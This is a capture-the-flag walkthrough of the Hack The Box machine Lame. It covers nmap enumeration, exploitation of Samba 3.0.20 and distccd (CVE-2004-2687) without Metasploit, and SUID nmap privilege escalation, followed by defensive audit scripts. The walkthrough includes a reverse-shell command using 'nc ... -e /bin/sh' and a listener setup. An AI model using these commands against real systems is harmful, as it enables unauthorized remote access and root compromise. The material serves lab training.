In this walkthrough, we're going to explore two ways to root Lame without Metasploit. If you are ready, let's dive in.
We start with an nmap scan, as usual:
Enumeration
nmap -p- 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:30 CDT
Nmap scan report for 10.129.22.59
Host is up (0.070s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
I usually scan all ports first, then look at each service individually. We will follow the same flow here.
We got FTP, SSH, SMB and distccd, so let's look into these services one at a time:
21 - FTP:
nmap -A -p21 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:34 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.15.162
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), Control4 HC-300 home controller (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 70.36 ms 10.10.14.1
2 70.76 ms 10.129.22.59
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds
Our scan reports Anonymous FTP login allowed (FTP code 230), which sounds promising.
Let's try to log in. The anonymous login works, but there is nothing of interest in there:
ftp 10.129.22.59
Connected to 10.129.22.59.
220 (vsFTPd 2.3.4)
Name (10.129.22.59:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||53820|).
150 Here comes the directory listing.
226 Directory send OK.
But when we check the FTP version, vsftpd 2.3.4, we find that this version is vulnerable to: VSFTPD 2.3.4 Backdoor Command Execution.
Because we do not want to use Metasploit, let's check the other services first.
22 - ssh
nmap -A -p22 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:39 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (91%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%), Linux 2.6.27 - 2.6.28 (90%), Linux 2.6.8 - 2.6.30 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 70.14 ms 10.10.14.1
2 70.53 ms 10.129.22.59
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds
It seems there is nothing to go on with SSH.
Let's move to SMB; for SMB we are going to scan 139 and 445 together.
139/445 - samba
nmap -A -p139,445 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:42 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (90%), Linux 2.6.8 - 2.6.30 (90%), Dell iDRAC 6 remote access controller (Linux 2.6) (90%), Linksys WRV54G WAP (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2026-04-20T16:43:38-04:00
|_clock-skew: mean: 2h00m39s, deviation: 2h49m44s, median: 37s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 70.41 ms 10.10.14.1
2 70.59 ms 10.129.22.59
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.91 seconds
The SMB/Samba version discovered is smbd 3.0.20-Debian. Let's try to access the shares with smbclient:
smbclient //10.129.22.59/anonymous
Password for [WORKGROUP\iamdayone]:
Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
It shows Anonymous login successful, so let's list the shares:
smbclient -L \\\\10.129.22.59\\
Password for [WORKGROUP\iamdayone]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
I was able to list the shares, but I was unable to access any of them.
Now let's check the version on Google for any known vulnerability. We find that Samba 3.0.20 is vulnerable to: username map script, and because I do not want to use Metasploit, I use the exploit here.
With the exploit we got a root shell, so there is no need for privilege escalation:
Remember that we still have one more service left; let's see if we can compromise that as well without Metasploit, why not:
3632 - distccd
nmap -A -p3632 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:45 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Citrix XenServer 5.5 (Linux 2.6.18) (90%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 3632/tcp)
HOP RTT ADDRESS
1 70.75 ms 10.10.14.1
2 71.01 ms 10.129.22.59
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds
The service version running is distccd v1; let's check whether it is vulnerable.
After some googling, we discovered that this version is vulnerable to: distccd v1 RCE (CVE-2004-2687). Remember, we do not want to use Metasploit.
After several searches, I found this exploit, which wouldn't work: exploit
I ported the exploit code to Python 3 to see if it would work: upgraded exploit here
Once you have the exploit ready, start an nc listener on your local machine:
nc -lvnp attacker_port
Then run the exploit with the command below:
python3 exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh"
I pop a shell:
If you noticed, with this shell, unlike the Samba shell, we are not root. Therefore, we need to escalate our privileges.
Privilege Escalation
First, let's check for SUID binaries we can use to become root:
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
From the output above, /usr/bin/nmap looks juicy. Let's check GTFOBins:
We found nmap and the command to run on GTFOBins, so what are we waiting for? Let's run the command:
We are root!
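The `find` output above is the attacker's view of the setuid binaries; as an added example (not code from the original walkthrough), here is the same inventory from the defender's side, diffing the setuid files actually present against the set the host is expected to carry, so a stray one such as /usr/bin/nmap shows up as a finding. The baseline is constructed for illustration and is not a vetted distribution list.

```python
"""Audit setuid binaries against an expected baseline (added example)."""
import os
import stat

# Constructed baseline of setuid files an administrator expects on this host.
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
    "/usr/bin/sudo", "/usr/bin/sudoedit", "/usr/bin/passwd",
    "/usr/bin/gpasswd", "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/newgrp",
}


def find_suid_files(root):
    """Walk `root` and return every regular file with the setuid bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry, skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(present, expected=EXPECTED_SUID):
    """Return setuid paths that are present but missing from the baseline."""
    return sorted(set(present) - set(expected))


# Constructed input: a subset of the `find` output from the walkthrough.
OBSERVED = [
    "/bin/su", "/bin/mount", "/usr/bin/sudo", "/usr/bin/passwd",
    "/usr/bin/nmap", "/usr/bin/netkit-rsh", "/usr/bin/netkit-rlogin",
]

if __name__ == "__main__":
    for path in unexpected_suid(OBSERVED):
        print("unexpected setuid binary:", path)
    # On a live host, run: unexpected_suid(find_suid_files("/"))
```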
Lessons Learned
This machine reinforced the importance of approaching exploitation from multiple angles. While distccd (CVE-2004-2687) provided a straightforward remote code execution path, exploring the Samba service revealed an alternative route to compromise. This highlights that real-world targets often have more than one viable attack vector.
Avoiding automated tools like Metasploit forced a deeper understanding of the underlying vulnerabilities. Rewriting the exploits improved my ability to analyze exploit logic, adapt payloads, and troubleshoot issues when things didn’t work as expected.
Another key takeaway is the critical role of thorough enumeration. Identifying outdated and vulnerable services early on made exploitation significantly easier. This emphasizes that enumeration is often the most important phase of a penetration test.
Finally, this machine demonstrates how legacy services such as distccd and Samba can pose serious security risks when left unpatched, reinforcing the importance of proper system hardening and regular updates.
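As an added example (not code from the original walkthrough), the check below re-reads the version banners the scans above produced and reports the ones this writeup identified as end-of-life or known-vulnerable, so a defender can run the same triage over their own `nmap -sV` output. The sample scan text and the banner list are constructed from this page only; the list is not a vulnerability database.

```python
"""Flag legacy service versions in plain-text `nmap -sV` output (added example)."""
import re

# Constructed sample: the VERSION lines from the scans in the walkthrough.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
"""

# Banner patterns and notes taken from the findings on this page.
LEGACY_BANNERS = [
    (re.compile(r"vsftpd 2\.3\.4"), "vsftpd 2.3.4: backdoored release, replace it"),
    (re.compile(r"Samba smbd 3\.0\.20"), "Samba 3.0.20: username map script RCE"),
    (re.compile(r"\bdistccd v1\b"), "distccd v1: CVE-2004-2687, unauthenticated RCE"),
]

# Matches one "<port>/<proto> open <service> <banner>" line of nmap output.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)$")


def parse_services(scan_text):
    """Return (port, service, banner) tuples for every open-port line."""
    found = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            found.append((int(m.group(1)), m.group(3), m.group(4).strip()))
    return found


def flag_legacy(scan_text):
    """Map each flagged port to its finding note; unflagged ports are omitted."""
    findings = {}
    for port, _service, banner in parse_services(scan_text):
        for pattern, note in LEGACY_BANNERS:
            if pattern.search(banner):
                findings[port] = note
    return findings


if __name__ == "__main__":
    for port, note in sorted(flag_legacy(SAMPLE_SCAN).items()):
        print(f"{port}/tcp  {note}")
```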